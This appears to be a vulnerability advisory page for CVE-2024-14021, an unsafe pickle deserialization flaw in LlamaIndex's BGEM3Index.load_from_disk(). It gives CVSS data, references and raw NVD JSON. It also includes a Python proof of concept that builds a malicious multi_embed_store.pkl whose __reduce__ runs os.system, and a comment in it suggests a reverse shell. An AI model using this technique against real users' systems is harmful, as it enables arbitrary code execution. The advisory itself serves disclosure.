CVE-2024-14021

Description

LlamaIndex (run-llama/llama_index) versions up to and including 0.11.6 contain an unsafe deserialization vulnerability in BGEM3Index.load_from_disk() in llama_index/indices/managed/bge_m3/base.py. The function uses pickle.load() to deserialize multi_embed_store.pkl from a user-supplied persist_dir without validation. An attacker who can provide a crafted persist directory containing a malicious pickle file can trigger arbitrary code execution when the victim loads the index from disk.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:llamaindex:llamaindex:*:*:*:*:*:*:*:* - VULNERABLE

LlamaIndex (run-llama/llama_index) <= 0.11.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

"""
CVE-2024-14021 PoC - LlamaIndex BGEM3Index Unsafe Deserialization
This PoC demonstrates how a malicious pickle file can trigger RCE.
"""

import os
import pickle
import base64

# Malicious pickle payload that executes arbitrary code
# This creates a reverse shell or executes system commands
class MaliciousPayload:
    def __reduce__(self):
        # Replace with your actual payload
        cmd = "whoami > /tmp/pwned.txt"
        return (os.system, (cmd,))

def create_malicious_pickle(output_path):
    """Create a malicious pickle file for exploitation"""
    malicious_obj = MaliciousPayload()
    
    # Serialize the malicious object
    pickle_data = pickle.dumps(malicious_obj)
    
    # Create persist_dir structure
    os.makedirs(output_path, exist_ok=True)
    
    # Write the malicious pickle file
    pickle_path = os.path.join(output_path, 'multi_embed_store.pkl')
    with open(pickle_path, 'wb') as f:
        f.write(pickle_data)
    
    print(f"[+] Malicious pickle file created at: {pickle_path}")
    return pickle_path

def exploit(target_persist_dir):
    """
    Simulate exploitation by loading the malicious pickle
    In real attack, victim would call BGEM3Index.load_from_disk(target_persist_dir)
    """
    pickle_path = os.path.join(target_persist_dir, 'multi_embed_store.pkl')
    
    if os.path.exists(pickle_path):
        print(f"[*] Loading pickle from: {pickle_path}")
        with open(pickle_path, 'rb') as f:
            # This triggers the arbitrary code execution
            data = pickle.load(f)
            print("[!] Pickle loaded successfully")

if __name__ == "__main__":
    # Create malicious persist directory
    malicious_dir = "./malicious_persist_dir"
    create_malicious_pickle(malicious_dir)
    
    print("\n[*] To exploit, victim would call:")
    print(f"    BGEM3Index.load_from_disk('{malicious_dir}')")
    print("\n[!] This PoC is for educational purposes only!")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2024-14021
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2024-14021
[3] CVE Details https://www.cvedetails.com/cve/CVE-2024-14021/
[4] VulDB https://vuldb.com/cve/CVE-2024-14021
[5] https://github.com/run-llama/llama_index
[6] https://huntr.com/bounties/ab4ceeb4-aa85-4d1c-aaca-4eda1b71fc12
[7] https://www.llamaindex.ai/
[8] https://www.vulncheck.com/advisories/llamaindex-bgem3index-unsafe-deserialization

Raw JSON Data

JSON

{"cve": {"id": "CVE-2024-14021", "sourceIdentifier": "[email protected]", "published": "2026-01-12T23:15:51.413", "lastModified": "2026-01-15T22:39:58.527", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LlamaIndex (run-llama/llama_index) versions up to and including 0.11.6 contain an unsafe deserialization vulnerability in BGEM3Index.load_from_disk() in llama_index/indices/managed/bge_m3/base.py. The function uses pickle.load() to deserialize multi_embed_store.pkl from a user-supplied persist_dir without validation. An attacker who can provide a crafted persist directory containing a malicious pickle file can trigger arbitrary code execution when the victim loads the index from disk."}, {"lang": "es", "value": "Las versiones de LlamaIndex (run-llama/llama_index) hasta la 0.11.6 inclusive contienen una vulnerabilidad de deserialización insegura en BGEM3Index.load_from_disk() en llama_index/indices/managed/bge_m3/base.py. La función utiliza pickle.load() para deserializar multi_embed_store.pkl de un persist_dir proporcionado por el usuario sin validación. Un atacante que pueda proporcionar un directorio persist_dir manipulado que contenga un archivo pickle malicioso puede desencadenar la ejecución de código arbitrario cuando la víctima carga el índice desde el disco."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:llamaindex:llamaindex:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.11.6", "matchCriteriaId": "C03B86D9-3F03-496D-A803-B1DC212F8FBF"}]}]}], "references": [{"url": "https://github.com/run-llama/llama_index", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://huntr.com/bounties/ab4ceeb4-aa85-4d1c-aaca-4eda1b71fc12", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.llamaindex.ai/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/llamaindex-bgem3index-unsafe-deserialization", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}